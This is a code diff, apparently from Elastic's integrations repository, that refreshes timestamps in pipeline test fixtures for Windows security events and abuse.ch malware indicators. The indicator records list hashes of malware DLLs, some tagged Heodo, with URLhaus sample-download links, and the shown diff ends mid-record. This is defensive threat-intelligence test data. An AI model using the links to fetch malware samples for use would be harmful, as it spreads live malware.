+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json
@@ -59,7 +59,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-07-30T21:06:12.801731825Z",
+ "ingested": "2021-12-09T13:46:03.893129100Z",
 "code": "4634",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -137,7 +137,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-07-30T21:06:12.801734292Z",
+ "ingested": "2021-12-09T13:46:03.893134600Z",
 "code": "4634",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json
index fcb5bb17d96..abedc3063b1 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json
@@ -81,7 +81,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-10-19T11:55:35.129471700Z",
+ "ingested": "2021-12-09T13:46:04.226615400Z",
 "code": "4688",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json
index dfc2b20d07c..cb2b04519a1 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json
@@ -63,7 +63,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-07-30T21:06:13.111337705Z",
+ "ingested": "2021-12-09T13:46:04.468666400Z",
 "code": "4689",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -145,7 +145,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-07-30T21:06:13.111340689Z",
+ "ingested": "2021-12-09T13:46:04.468674800Z",
 "code": "4689",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -227,7 +227,7 @@
 "name": "vagrant"
 },
 "event": {
- "ingested": "2021-07-30T21:06:13.111341286Z",
+ "ingested": "2021-12-09T13:46:04.468680700Z",
 "code": "4689",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json
index 2f34a127b47..496acdd0433 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json
@@ -24,7 +24,7 @@
 "level": "information"
 },
 "event": {
- "ingested": "2021-10-05T21:22:48.942317400Z",
+ "ingested": "2021-12-09T13:46:04.990550600Z",
 "code": "65536",
 "provider": "Microsoft-Windows-Eventlog",
 "kind": "event",
diff --git a/packages/system/manifest.yml b/packages/system/manifest.yml
index a18f5f1c951..e74f1bc8d87 100644
--- a/packages/system/manifest.yml
+++ b/packages/system/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: system
 title: System
-version: 1.6.4
+version: 1.6.5
 license: basic
 description: Collect system logs and metrics from your servers with Elastic Agent.
 type: integration
diff --git a/packages/ti_abusech/changelog.yml b/packages/ti_abusech/changelog.yml
index 6e5572a9d49..be88686cfcb 100644
--- a/packages/ti_abusech/changelog.yml
+++ b/packages/ti_abusech/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.1.3"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.1.2"
 changes:
 - description: Fixing typo in base-fields.yml
diff --git a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json
index a289a843476..c389ac03ae4 100644
--- a/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json
+++ b/packages/ti_abusech/data_stream/malware/_dev/test/pipeline/test-malware-ndjson.log-expected.json
@@ -36,7 +36,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682403442Z",
+ "ingested": "2021-12-13T08:40:03.807747500Z",
 "original": "{\"md5_hash\":\"7871286a8f1f68a14b18ae475683f724\",\"sha256_hash\":\"48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:14:05\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/48a6aee18bcfe9058b35b1018832aef1c9efd8f50ac822f49abb484a5e2a4b1f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG5:X5DpBw/KViMTB1MnEWk0115JW\",\"tlsh\":\"1344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}",
 "category": "threat",
 "type": "indicator",
@@ -82,7 +82,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682431004Z",
+ "ingested": "2021-12-13T08:40:03.807764300Z",
 "original": "{\"md5_hash\":\"7b4c77dc293347b467fb860e34515163\",\"sha256_hash\":\"ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/ec59538e8de8525b1674b3b8fe0c180ac822145350bcce054ad3fc6b95b1b5a4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGY:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"4E44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}",
 "category": "threat",
 "type": "indicator",
@@ -134,7 +134,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682438568Z",
+ "ingested": "2021-12-13T08:40:03.807776600Z",
 "original": "{\"md5_hash\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"sha256_hash\":\"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:22\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/\",\"virustotal\":{\"result\":\"25 / 66\",\"percent\":\"37.88\",\"link\":\"https://www.virustotal.com/gui/file/b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7/detection/f-b0e914d\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGG:X5DpBw/KViMTB1MnEWk0115Jd\",\"tlsh\":\"7544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}",
 "category": "threat",
 "type": "indicator",
@@ -180,7 +180,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682444509Z",
+ "ingested": "2021-12-13T08:40:03.807787900Z",
 "original": "{\"md5_hash\":\"e2e02aae857488dbdbe6631c29abf3f8\",\"sha256_hash\":\"7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:11:21\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7483e834a73fb6817769596fe4c0fa01d28639f52bbbdc2b8a56c36d466dd7f8/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ9:0h3eZgRQCcw+MN54dEq7kqRtoLZH\",\"tlsh\":\"5554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}",
 "category": "threat",
 "type": "indicator",
@@ -223,7 +223,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682449689Z",
+ "ingested": "2021-12-13T08:40:03.807799200Z",
 "original": "{\"md5_hash\":\"3e988e32b0c3c230d534e286665b89a5\",\"sha256_hash\":\"760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b\",\"file_type\":\"unknown\",\"file_size\":\"352\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/760e729426fb115b967a41e5a6f2f42d7a52a5cee74ed99065a6dc39bf89f59b/\",\"virustotal\":null,\"imphash\":null,\"ssdeep\":\"6:TE6ll8uXi0jIAv6BHvPuA7RKTmOQamsQMGvMQgTYbtsWsQ72hCqPZG/:TTll8uTo5uA7RKtQamsS0QJfsQ7mCR\",\"tlsh\":\"3CE0C002AB26C036500D154C221655B3B871911503CA14E6A6824BEA765D4A3290D190\"}",
 "category": "threat",
 "type": "indicator",
@@ -275,7 +275,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682454859Z",
+ "ingested": "2021-12-13T08:40:03.807810400Z",
 "original": "{\"md5_hash\":\"dcc20d534cdf29eab03d8148bf728857\",\"sha256_hash\":\"86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:08:02\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/\",\"virustotal\":{\"result\":\"27 / 69\",\"percent\":\"39.13\",\"link\":\"https://www.virustotal.com/gui/file/86655c0bcf9b21b5efc682f58eb80f42811042ba152358e1bfbbb867315a60ac/detection/f-86655c0\"},\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGI:X5DpBw/KViMTB1MnEWk0115JH\",\"tlsh\":\"0D44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}",
 "category": "threat",
 "type": "indicator",
@@ -321,7 +321,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682459527Z",
+ "ingested": "2021-12-13T08:40:03.807886200Z",
 "original": "{\"md5_hash\":\"f6facbf7a90b9e67a6de9f6634eb40ba\",\"sha256_hash\":\"e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:53\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e91c9e11d3ce4f55fabd7196279367482d2fabfa32df81e614b15fc53b4e26be/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJ1:0h3eZgRQCcw+MN54dEq7kqRtoLZL\",\"tlsh\":\"2554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}",
 "category": "threat",
 "type": "indicator",
@@ -367,7 +367,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682464887Z",
+ "ingested": "2021-12-13T08:40:03.807898100Z",
 "original": "{\"md5_hash\":\"44325fd5bdda2e2cdea07c3a39953bb1\",\"sha256_hash\":\"beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:41\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/beedbbcacfc34b5edd8c68e3e4acf364992ebbcd989548e09e38fa03c5659bac/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Jg\",\"tlsh\":\"A044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}",
 "category": "threat",
 "type": "indicator",
@@ -415,7 +415,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682469937Z",
+ "ingested": "2021-12-13T08:40:03.807909300Z",
 "original": "{\"md5_hash\":\"4c549051950522a3f1b0814aa9b1f6d1\",\"sha256_hash\":\"7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:07:31\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/7cba55da723c0e020267a02e6ffc83e03a83701757fc4ec65ea398618ad881cf/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG4:X5DpBw/KViMTB1MnEWk0115Jv\",\"tlsh\":\"4544D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}",
 "category": "threat",
 "type": "indicator",
@@ -461,7 +461,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682474806Z",
+ "ingested": "2021-12-13T08:40:03.807920500Z",
 "original": "{\"md5_hash\":\"d7333113098d88b6a5dd5b8eb24f9b87\",\"sha256_hash\":\"426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/426be5e085e6bbad8430223dc89d8d3ced497133f8d478fd00005bcbb73399d4/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJw:0h3eZgRQCcw+MN54dEq7kqRtoLZW\",\"tlsh\":\"9454CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}",
 "category": "threat",
 "type": "indicator",
@@ -507,7 +507,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:05.682479505Z",
+ "ingested": "2021-12-13T08:40:03.807931800Z",
 "original": "{\"md5_hash\":\"c8dbb261c1f450534c3693da2f4b479f\",\"sha256_hash\":\"25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:07\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/25093afdaeb3ea000743ab843360a6b64f58c0a1ab950072ba6528056735deb9/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGe:X5DpBw/KViMTB1MnEWk0115JR\",\"tlsh\":\"F344D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}",
 "category": "threat",
 "type": "indicator",
@@ -553,7 +553,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682484534Z", + "ingested": "2021-12-13T08:40:03.807943800Z", "original": "{\"md5_hash\":\"714953f1d0031a4bb2f0c44afd015931\",\"sha256_hash\":\"b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:06\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/b3327a96280365e441057f490df6261c9a2400fd63719eb9a7a0c9db95beecc5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115J7\",\"tlsh\":\"F644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -599,7 +599,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682493160Z", + "ingested": "2021-12-13T08:40:03.807955400Z", "original": "{\"md5_hash\":\"20fd22742500d4cec123398afc3d3672\",\"sha256_hash\":\"e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:07:00\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/e92b54904391c171238863b584355197ba4508f73320a8e89afbb5425fc2dc4b/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGc:X5DpBw/KViMTB1MnEWk0115JP\",\"tlsh\":\"BE44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -645,7 +645,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682499282Z", + "ingested": "2021-12-13T08:40:03.808039Z", "original": "{\"md5_hash\":\"aa81ceea053797a6f8c38a0f2f9b80b0\",\"sha256_hash\":\"dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:06:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/dd15e74b3cd3a4fdb5f47adefd6f90e27d5a20e01316cc791711f6dce7c0f52e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGf:X5DpBw/KViMTB1MnEWk0115Jo\",\"tlsh\":\"CC44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", @@ -693,7 +693,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682504943Z", + "ingested": "2021-12-13T08:40:03.808106100Z", "original": "{\"md5_hash\":\"a2ce6795664c0fa93b07fa54ba868991\",\"sha256_hash\":\"0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:06:13\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/0fae1eeabc4f5e07bd16f7851aec5ab6032d407c7ff0270f2b6e85c2a3efebd1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGD:X5DpBw/KViMTB1MnEWk0115JY\",\"tlsh\":\"8C44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -739,7 +739,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682509581Z", + "ingested": "2021-12-13T08:40:03.808119Z", "original": "{\"md5_hash\":\"9b9bac158dacb9c2f5511e9c464a7de4\",\"sha256_hash\":\"07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:52\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/07a9d84c0b2c8cf1fd90ab409b9399d06920ab4b6efb647b5a3b9bef1045ee7e/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKk:W5MT4WNaHy9P1FjbrjlKk\",\"tlsh\":\"6B54CF217A53C826F5E800FCA6E9878914167F346F44A4C773D40F6AA8759E2EF2B317\"}", "category": "threat", "type": "indicator", @@ -785,7 +785,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682514240Z", + "ingested": "2021-12-13T08:40:03.808131Z", "original": "{\"md5_hash\":\"e48e3fa5e0f7b21c1ecf1efc81ff91e8\",\"sha256_hash\":\"708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:51\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/708c0193aec6354af6877f314d4b0e3864552bac77258bee9ee5bf886a116df5/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGo:X5DpBw/KViMTB1MnEWk0115Jj\",\"tlsh\":\"6644D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -833,7 +833,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682519710Z", + "ingested": "2021-12-13T08:40:03.808142500Z", "original": "{\"md5_hash\":\"8957f5347633ab4b10c2ae4fb92c8572\",\"sha256_hash\":\"f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:50\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/f70a3c016fe791eb30959961f0bcaa08ba7b738491b9ae61cb4a667cd1de8b37/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJy:0h3eZgRQCcw+MN54dEq7kqRtoLZM\",\"tlsh\":\"0754CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -879,7 +879,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682524519Z", + "ingested": "2021-12-13T08:40:03.808153800Z", "original": "{\"md5_hash\":\"09cc76b7077b4d5704e46e864575ff03\",\"sha256_hash\":\"94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:36\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/94ca186561b13fa9b1bf15f7e66118debc686b40d2a62a5cf4b3c6ca6ee1c7a1/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG/:X5DpBw/KViMTB1MnEWk0115Js\",\"tlsh\":\"BB44D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -925,7 +925,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682529328Z", + "ingested": "2021-12-13T08:40:03.808172600Z", "original": "{\"md5_hash\":\"98a1cdf7de4232363f1d1e0f33dbfd99\",\"sha256_hash\":\"909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:16\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/909f890dbc5748845cf06d0fb0b73a5c0cb17761f37e9cd4810eea0d0eb8627f/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJQ:0h3eZgRQCcw+MN54dEq7kqRtoLZ+\",\"tlsh\":\"C554CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", @@ -973,7 +973,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682533927Z", + "ingested": "2021-12-13T08:40:03.808282800Z", "original": "{\"md5_hash\":\"8a51830c1662513ba6bd44e2f7849547\",\"sha256_hash\":\"d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa\",\"file_type\":\"dll\",\"file_size\":\"284672\",\"signature\":\"Heodo\",\"firstseen\":\"2021-01-14 06:05:15\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d1fa76346bef5bc8adaa615e109894a7c30f0bef07ab6272409c4056ea8d52aa/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/\",\"tlsh\":\"1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717\"}", "category": "threat", "type": "indicator", 
@@ -1019,7 +1019,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682538425Z", + "ingested": "2021-12-13T08:40:03.808295800Z", "original": "{\"md5_hash\":\"ae21d742a8118d6b86674aa5370bd6a7\",\"sha256_hash\":\"3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51\",\"file_type\":\"dll\",\"file_size\":\"280064\",\"signature\":null,\"firstseen\":\"2021-01-14 06:05:12\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS\",\"tlsh\":\"5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317\"}", "category": "threat", "type": "indicator", @@ -1065,7 +1065,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682543024Z", + "ingested": "2021-12-13T08:40:03.808313200Z", "original": "{\"md5_hash\":\"78c9d88d24ed1d982a83216eed1590f6\",\"sha256_hash\":\"d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99\",\"file_type\":\"dll\",\"file_size\":\"277504\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:38\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/\",\"virustotal\":null,\"imphash\":\"68aea345b134d576ccdef7f06db86088\",\"ssdeep\":\"6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr\",\"tlsh\":\"6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717\"}", "category": "threat", "type": "indicator", 
@@ -1111,7 +1111,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682547863Z", + "ingested": "2021-12-13T08:40:03.808326100Z", "original": "{\"md5_hash\":\"236577d5d83e2a8d08623a7a7f724188\",\"sha256_hash\":\"8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa\",\"file_type\":\"dll\",\"file_size\":\"241664\",\"signature\":null,\"firstseen\":\"2021-01-14 06:04:26\",\"urlhaus_download\":\"https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/\",\"virustotal\":null,\"imphash\":\"ed2860c18f5483e3b5388bad75169dc1\",\"ssdeep\":\"6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC\",\"tlsh\":\"8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5\"}", "category": "threat", "type": "indicator", @@ -1157,7 +1157,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:05.682552301Z", + "ingested": "2021-12-13T08:40:03.808337400Z", "original": 